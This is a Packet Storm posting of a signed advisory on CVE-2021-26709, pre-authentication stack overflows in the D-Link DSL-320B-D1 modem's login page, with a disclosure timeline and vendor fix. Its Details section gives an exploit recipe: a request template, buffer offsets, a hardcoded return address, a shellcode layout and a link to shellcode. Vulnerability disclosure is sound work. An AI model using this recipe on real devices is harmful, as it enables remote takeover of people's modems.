exploit the possibilities

D-Link DSL-320B-D1 Pre-Authentication Buffer Overflow

D-Link DSL-320B-D1 Pre-Authentication Buffer Overflow
Posted Apr 8, 2021
Authored by Gabriele Gristina

The D-Link DSL-320B-D1 ADSL modem suffers from multiple pre-authentication stack buffer overflow vulnerabilities.

tags | exploit, overflow, vulnerability
advisories | CVE-2021-26709
MD5 | 5f8a697c2829e549f81af766926d0ea9

D-Link DSL-320B-D1 Pre-Authentication Buffer Overflow

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Multiple Pre-Auth Stack Buffer Overflow in D-Link DSL-320B-D1 ADSL Modem

======== < Table of Contents > =========================================

0. Overview
1. Details
2. Solution
3. Disclosure Timeline
4. Thanks & Acknowledgements
5. References
6. Credits
7. Legal Notices

======== < 0. Overview > ===============================================

Release Date: 7 March 2021

Revision: 1.0

Impact:

The ADSL modem DSL-320B-D1, version EU_1.25 and lower, is affected to
multiple Stack Buffer Overflows that allow unauthenticated remote
attackers to takeover the device.

Severity: Critical

CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

CVE-ID: CVE-2021-26709

Vendor: D-Link

Affected Products: DSL-320B-D1

Affected Versions: EU_1.25 and lower

======== < 1. Details > ================================================

During a Penetration Test it was possible to identify and exploit
multiple Stack Buffer Overflows (1) in the D-Link DSL-320B-D1 ADSL modem
,a now legacy model, which is distributed in the past by Telecom Italia
on loan for use together with the residential ADSL line.

The vulnerabilities are present in the login functionality, exposed by
"login.xgi" with "user" and "pass" parameters.

[[
GET /login.xgi?user=" + payload + "&pass=abcde HTTP/1.1\nHost: " +
host + "\n\n"
]]

To exploit the vulnerability using "user" parameter, you need
construct the payload like the following:

[[
OFFSET = 652
ADDR = 0x7ffe8ab0

payload = "A"*OFFSET
payload += pack(">I", ADDR)
payload += shellcode
]]

While the "pass" parameter uses 641 as offset.

The payload must be passed as parameter value in a GET request.

You can found a working shellcode here:
https://www.exploit-db.com/shellcodes/45541

You will have to change the ip/port to match your network configuration.

Using ROP is possible to avoid to use the hardcoded addresses.

======== < 2. Solution > ===============================================

Refer to D-Link Support Announcements "SAP10216" for details (2).

======== < 3. Disclosure Timeline > ====================================

09/01/2021 : Discovery of the vulnerability
23/01/2021 : Vulnerability submitted to vendor
25/01/2021 : Vendor request more info about exploit the vulnerabilities
27/01/2021 : Sent details to vendor
01/02/2021 : Request status update to the vendor
13/02/2021 : Sent CVE assigned by mitre to vendor
13/02/2021 : Vendor response, analysis in progress
30/03/2021 : Request status update to the vendor
30/03/2021 : Vendor confirm the vulnerabilities
07/04/2021 : Public disclosure

======== < 4. Thanks & Acknowledgements > ==============================

D-Link US SIRT

======== < 5. References > =============================================

(1) https://cwe.mitre.org/data/definitions/121.html
(2) https://supportannouncement.us.dlink.com/announcement/publication.as
px?name=SAP10216
(3) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26709

======== < 6. Credits > ================================================

This vulnerability was discovered and reported by:

Gabriele 'matrix' Gristina (gabriele DOT gristina AT gmail DOT com)

Contacts:

https://www.linkedin.com/in/gabrielegristina
https://twitter.com/gm4tr1x
https://github.com/matrix/

======== < 7. Legal Notices > ==========================================

Copyright (c) 2021 Gabriele 'matrix' Gristina

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use in an AS IS
condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on,this information.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEElKssfhju0ogMPPCn7SvzgGQpUxsFAmBuug8ACgkQ7SvzgGQp
UxsERA//SsjAPq95yZItWPBiSrOSxUuRUUAzwzuo4bIYNb5bjfMDgB/HsnwwtG5W
yPXUoKWHLxyaX3nconGirDOHNSYNTd23sYXx+K3T97l/cPNZ3Nv5vk9DRDK76NNc
Xe2v7WdBBS1jAbuKKAHv8ioc+uxPs9oi9Iz70Uv9pQsaq2QSm6B+AX5s0fQIsgje
glPPYMLAasdmr4Wwk6XBOrzw8zvnkMxaRGsIJ2QmIpl7kmiN2BivSSKWfS8rUhEG
RfhIyTjDyN1yHU+GOTEJe04D8CjpLSUCsfFz7BxPYs1IFK44RZfiMJp4c7o7vMPG
uXJWpeq6wfraCh/g/JY5rvOpiyYC5e+mtg8MQjJW5ZEkK8Szg14douVn/bLsRFIc
cEs3mImqE/8pwksKDRLqAUq9/Q1dt5FRwFLJDpX5e18bwR1XOU1+iRMQJuUGBnre
UEibw1u8bSjJakFi9gCXQC2LrvbAC/tc97I42bA7qhiJxmOaMdPWt/C7Is/bVdYB
JdVUej2eMBlsmfVaPbM6aT18+Z9sfIMKaGq9nAbBmY+DNI6gBfX0ty8X1o39ADcQ
I+DEXnKBZP1YhWlvYYR5mBMYs9wJzw8OGyeGqK2LU1tmWfF9d0drXK5pvK1sSpQh
/ytQ4g/jSRp+UBK7Ulxep08gCphGuAkc7NuKsbHh4YgkCbIaIDI=
=4j+1
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close